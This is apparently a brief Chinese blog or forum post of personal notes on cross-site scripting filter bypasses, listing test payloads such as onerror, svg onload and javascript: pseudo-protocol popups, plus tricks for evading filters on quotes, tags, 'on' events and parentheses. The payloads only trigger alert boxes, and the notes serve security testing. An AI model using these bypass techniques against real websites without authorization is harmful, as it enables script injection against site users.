为什么一天发两个才有券啊啊啊啊
凑个数
<img src=1>空格可以用斜杠 / 替换
用语句<img/src=1>查看一下有没有被过滤掉,没有的话插入弹窗语句
弹窗语句:
<img/src=1 onerror=alert(1)>
用">把前面注释掉,然后插入自己要插入的代码(有时是 ' )
"<如果被转义,说明这个地方不存在XSS,输入点找的不对,看看其他输入点
on事件—on被更改为o_n,可以改变大小写
on被过滤,使用伪协议:<iframe src="javascript:alert(1) ">
<img被过滤,试一下大小写,不行,更换标签:<svg/onload=prompt(1)>;<svg/onload=alert(1)>
script被过滤,用 " 闭合前面属性,空格,后面加新的属性:οnmοuseοver=alert(1),再加空格或者//
()被过滤,用反引号替换
<>对被过滤可以试一下语句去掉后面>,也就是不闭合
"被过滤:<a href="输出点">改为<a href="javascript:alert(1)">(即伪协议)
有两个输出点,一个被过滤可以利用另一个
弹窗函数有:
confirm()、prompt()以及alert()
<script>prompt(1)</script>
<script>confirm(XSS)</script>